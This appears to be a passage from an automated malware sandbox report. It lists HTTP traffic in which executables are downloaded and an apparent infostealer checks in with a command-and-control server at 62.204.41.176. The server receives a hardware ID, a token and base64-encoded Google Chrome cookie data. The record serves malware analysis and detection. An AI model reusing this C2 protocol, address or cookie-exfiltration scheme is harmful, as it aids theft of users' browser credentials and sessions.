3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:35 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:36 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 06:38:37 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.176Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDHHost: 62.204.41.176Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 32 37 46 34 35 39 42 35 38 32 33 33 38 31 35 39 31 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 38 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 2d 2d 0d 0a Data Ascii: ------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="hwid"5827F459B5823381591466------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="build"default8_cap------HDAFBGIJKEGIECAAFHDH--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJKKKJJJKJKFHJJJJEHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 66 64 38 63 64 38 63 63 66 63 39 34 32 33 30 61 66 35 30 65 35 38 61 34 36 30 33 62 32 35 30 33 33 36 30 61 30 64 64 61 64 33 36 36 64 39 66 34 66 36 32 37 36 38 37 32 35 64 64 33 63 61 32 38 30 31 65 39 64 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="token"f6fd8cd8ccfc94230af50e58a4603b2503360a0ddad366d9f4f62768725dd3ca2801e9d5------HJKJKKKJJJKJKFHJJJJEContent-Disposition: form-data; name="message"browsers------HJKJKKKJJJKJKFHJJJJE--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKKECBGIIJJKECGIJEHost: 62.204.41.176Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 66 64 38 63 64 38 63 63 66 63 39 34 32 33 30 61 66 35 30 65 35 38 61 34 36 30 33 62 32 35 30 33 33 36 30 61 30 64 64 61 64 33 36 36 64 39 66 34 66 36 32 37 36 38 37 32 35 64 64 33 63 61 32 38 30 31 65 39 64 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 4b 45 43 42 47 49 49 4a 4a 4b 45 43 47 49 4a 45 2d 2d 0d 0a Data Ascii: ------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="token"f6fd8cd8ccfc94230af50e58a4603b2503360a0ddad366d9f4f62768725dd3ca2801e9d5------AEBKKECBGIIJJKECGIJEContent-Disposition: form-data; name="message"plugins------AEBKKECBGIIJJKECGIJE--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKKEHJDHJKFIECAAKFIHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 66 64 38 63 64 38 63 63 66 63 39 34 32 33 30 61 66 35 30 65 35 38 61 34 36 30 33 62 32 35 30 33 33 36 30 61 30 64 64 61 64 33 36 36 64 39 66 34 66 36 32 37 36 38 37 32 35 64 64 33 63 61 32 38 30 31 65 39 64 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 2d 2d 0d 0a Data Ascii: ------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="token"f6fd8cd8ccfc94230af50e58a4603b2503360a0ddad366d9f4f62768725dd3ca2801e9d5------IJKKEHJDHJKFIECAAKFIContent-Disposition: form-data; name="message"fplugins------IJKKEHJDHJKFIECAAKFI--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: 62.204.41.176Content-Length: 5687Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /db293a2c1b1c70c4/sqlite3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 62.204.41.176Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 66 64 38 63 64 38 63 63 66 63 39 34 32 33 30 61 66 35 30 65 35 38 61 34 36 30 33 62 32 35 30 33 33 36 30 61 30 64 64 61 64 33 36 36 64 39 66 34 66 36 32 37 36 38 37 32 35 64 64 33 63 61 32 38 30 31 65 39 64 35 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 67 33 4d 7a 67 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 67 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 33 4f 54 4d 34 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 33 4a 6a 55 30 6c 75 62 31 70 43 59 6a 5a 54 63 6e 63 77 55 47 52 51 54 55 35 6c 54 45 64 4c 63 32 56 6e 5a 6b 78 70 4c 58 52 52 62 6e 5a 70 61 47 38 31 61 45 74 4b 57 45 74 45 54 6d 63 77 61 31 68 4a 55 47 35 6d 56 47 4e 31 64 31 59 31 63 6a 64 53 63 57 70 55 4f 44 6b 7a 63 46 64 48 53 6b 59 33 61 32 78 4c 63 57 78 6b 51 6d 39 71 4e 48 4a 45 53 6e 5a 34 5a 6b 5a 73 5a 30 52 50 51 32 4e 58 4f 57 46 4c 52 47 35 56 4f 58 70 4a 62 46 56 6f 4d 6b 78 51 4d 48 5a 50 4f 47 73 7a 64 56 51 77 5a 30 68 4b 52 44 46 4b 64 6c 5a 42 59 32 78 72 53 6d 35 4c 64 31 70 48 4e 6d 68 45 51 57 77 32 4d 6b 68 79 54 58 68 4f 63 6c 56 6c 63 56 4e 53 4c 56 64 47 4d 55 6f 74 62 44 6c 5a 57 57 64 46 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"f6fd8cd8ccfc94230af50e58a4603b2503360a0ddad366d9f4f62768725dd3ca2801e9d5------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZk
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHDHost: 62.204.41.176Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 66 64 38 63 64 38 63 63 66 63 39 34 32 33 30 61 66 35 30 65 35 38 61 34 36 30 33 62 32 35 30 33 33 36 30 61 30 64 64 61 64 33 36 36 64 39 66 34 66 36 32 37 36 38 37 32 35 64 64 33 63 61 32 38 30 31 65 39 64 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 2d 2d 0d 0a Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"f6fd8cd8ccfc94230af50e58a4603b2503360a0ddad366d9f4f62768725dd3ca2801e9d5------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
Source: global traffic HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHJECAAAFHIJKFIJEGCHost: 62.204.41.176Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 66 64 38 63 64 38 63 63 66 63 39 34 32 33 30 61 66 35 30 65 35 38 61 34 36 30 33 62 32 35 30 33 33 36 30 61 30 64 64 61 64 33 36 36 64 39 66 34 66 36 32 37 36 38 37 32 35 64 64 33 63 61 32 38 30 31 65 39 64 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 4a 45 43 41 41 41 46 48 49 4a 4b 46 49 4a 45 47 43 2d 2d 0d 0a Data Ascii: ------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; name="token"f6fd8cd8ccfc94230af50e58a4603b2503360a0ddad366d9f4f62768725dd3ca2801e9d5------BFHJECAAAFHIJKFIJEGCContent-Disposition: form-data; 